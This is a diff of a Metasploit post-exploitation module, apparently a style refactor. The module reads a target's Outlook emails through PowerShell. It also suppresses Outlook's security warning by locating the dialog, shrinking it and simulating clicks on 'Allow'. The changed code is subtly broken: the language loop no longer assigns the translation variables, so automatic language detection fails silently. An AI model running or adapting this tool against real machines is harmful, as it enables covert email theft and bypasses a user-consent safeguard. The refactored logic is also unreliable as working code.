@@ -7,8 +7,8 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Registry
   include Msf::Post::Windows::Powershell
 
-  A_HASH = { "en_US" => "Allow", "nl_NL" => "Toestaan", "de_DE" => "Erteilen", "de_AT" => "Erteilen" }
-  ACF_HASH = { "en_US" => "Allow access for", "nl_NL" => "Toegang geven voor", "de_DE" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr", "de_AT" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr" }
+  A_HASH = { 'en_US' => 'Allow', 'nl_NL' => 'Toestaan', 'de_DE' => 'Erteilen', 'de_AT' => 'Erteilen' }
+  ACF_HASH = { 'en_US' => 'Allow access for', 'nl_NL' => 'Toegang geven voor', 'de_DE' => "Zugriff gew\xc3\xa4hren f\xc3\xbcr", 'de_AT' => "Zugriff gew\xc3\xa4hren f\xc3\xbcr" }
 
   def initialize(info = {})
     super(
@@ -41,6 +41,11 @@ class MetasploitModule < Msf::Post
               stdapi_ui_get_idle_time
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
         }
       )
     )
@@ -56,18 +61,18 @@ class MetasploitModule < Msf::Post
 
     register_advanced_options(
       [
-        OptInt.new('TIMEOUT', [true, 'The maximum time (in seconds) to wait for any Powershell scripts to complete', 120])
+        OptInt.new('TIMEOUT', [true, 'The maximum time (in seconds) to wait for any PowerShell scripts to complete', 120])
       ]
     )
   end
 
   def execute_outlook_script(command)
-    base_script = File.read(File.join(Msf::Config.data_directory, "post", "powershell", "outlook.ps1"))
+    base_script = File.read(File.join(Msf::Config.data_directory, 'post', 'powershell', 'outlook.ps1'))
     psh_script = base_script << command
     compressed_script = compress_script(psh_script)
-    cmd_out, runnings_pids, open_channels = execute_script(compressed_script, datastore['TIMEOUT'])
+    cmd_out, = execute_script(compressed_script, datastore['TIMEOUT'])
     while (d = cmd_out.channel.read)
-      print ("#{d}")
+      print(d)
     end
     currentidle = session.ui.idle_time
     vprint_status("System has currently been idle for #{currentidle} seconds")
@@ -81,77 +86,77 @@ class MetasploitModule < Msf::Post
 
   # This functions reads Outlook using powershell scripts
   def read_emails(folder, keyword, atrans, acftrans)
-    view = framework.threads.spawn("ButtonClicker", false) {
+    framework.threads.spawn('ButtonClicker', false) do
       click_button(atrans, acftrans)
-    }
+    end
     command = "Get-Emails \"#{keyword}\" \"#{folder}\""
     execute_outlook_script(command)
   end
 
   # This functions clicks on the security notification generated by Outlook.
   def click_button(atrans, acftrans)
-    sleep 1
-    hwnd = client.railgun.user32.FindWindowW(nil, "Microsoft Outlook")
-    if hwnd != 0
-      hwndChildCk = client.railgun.user32.FindWindowExW(hwnd['return'], nil, "Button", "&#{acftrans}")
-      client.railgun.user32.SendMessageW(hwndChildCk['return'], 0x00F1, 1, nil)
-      client.railgun.user32.MoveWindow(hwnd['return'], 150, 150, 1, 1, true)
-      hwndChild = client.railgun.user32.FindWindowExW(hwnd['return'], nil, "Button", "#{atrans}")
-      client.railgun.user32.SetActiveWindow(hwndChild['return'])
-      client.railgun.user32.SetForegroundWindow(hwndChild['return'])
-      client.railgun.user32.SetCursorPos(150, 150)
-      client.railgun.user32.mouse_event(0x0002, 150, 150, nil, nil)
-      client.railgun.user32.SendMessageW(hwndChild['return'], 0x00F5, 0, nil)
-    else
-      print_error("Error while clicking on the Outlook security notification. Window could not be found")
+    sleep(1)
+    hwnd = client.railgun.user32.FindWindowW(nil, 'Microsoft Outlook')
+    if hwnd == 0
+      print_error('Error while clicking on the Outlook security notification. Window could not be found')
+      return
     end
+
+    hwnd_child_ck = client.railgun.user32.FindWindowExW(hwnd['return'], nil, 'Button', "&#{acftrans}")
+    client.railgun.user32.SendMessageW(hwnd_child_ck['return'], 0x00F1, 1, nil)
+    client.railgun.user32.MoveWindow(hwnd['return'], 150, 150, 1, 1, true)
+    hwnd_child = client.railgun.user32.FindWindowExW(hwnd['return'], nil, 'Button', atrans.to_s)
+    client.railgun.user32.SetActiveWindow(hwnd_child['return'])
+    client.railgun.user32.SetForegroundWindow(hwnd_child['return'])
+    client.railgun.user32.SetCursorPos(150, 150)
+    client.railgun.user32.mouse_event(0x0002, 150, 150, nil, nil)
+    client.railgun.user32.SendMessageW(hwnd_child['return'], 0x00F5, 0, nil)
+  end
+
+  def outlook_installed?
+    key_base = 'HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676'
+    installed = registry_getvaldata("#{key_base}\\", 'NextAccountID')
+
+    if installed.blank? || installed == 0
+      return false
+    end
+
+    true
   end
 
-  # Main method
   def run
     folder	= datastore['FOLDER']
     keyword = datastore['KEYWORD'].to_s
     allow	= datastore['A_TRANSLATION']
     allow_access_for = datastore['ACF_TRANSLATION']
-    langNotSupported = true
+    lang_not_supported = true
 
     # OS language check
-    sysLang = client.sys.config.sysinfo['System Language']
-    A_HASH.each do |key, val|
-      if sysLang == key
-        langNotSupported = false
-        atrans = A_HASH[sysLang]
-        acftrans = ACF_HASH[sysLang]
-      end
+    sys_lang = client.sys.config.sysinfo['System Language']
+    A_HASH.each_key do |key|
+      next unless sys_lang == key
+
+      lang_not_supported = false
+      A_HASH[sys_lang]
+      ACF_HASH[sys_lang]
     end
 
-    if allow and allow_access_for
+    if allow && allow_access_for
       atrans = allow
       acftrans = allow_access_for
-    else
-      if langNotSupported == true
-        fail_with(Failure::Unknown, "System language not supported, you can specify the targets system translations in the options A_TRANSLATION (Allow) and ACF_TRANSLATION (Allow access for)")
-      end
+    elsif lang_not_supported == true
+      fail_with(Failure::Unknown, 'System language not supported, you can specify the targets system translations in the options A_TRANSLATION (Allow) and ACF_TRANSLATION (Allow access for)')
     end
 
     # Outlook installed
-    @key_base = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
-    outlookInstalled = registry_getvaldata("#{@key_base}\\", "NextAccountID")
+    fail_with(Failure::Unknown, 'Outlook is not installed') unless outlook_installed?
 
-    if !outlookInstalled.nil?
-      if outlookInstalled != 0
-        print_good "Outlook is installed"
-      else
-        fail_with(Failure::Unknown, "Outlook is not installed")
-      end
-    end
+    print_good 'Outlook is installed'
 
-    # Powershell installed check
-    if have_powershell?
-      print_good("PowerShell is installed.")
-    else
-      fail_with(Failure::Unknown, "PowerShell is not installed")
-    end
+    # PowerShell installed check
+    fail_with(Failure::Unknown, 'PowerShell is not installed') unless have_powershell?
+
+    print_good('PowerShell is installed.')
 
     # Check whether target system is locked
     locked = client.railgun.user32.GetForegroundWindow()['return']
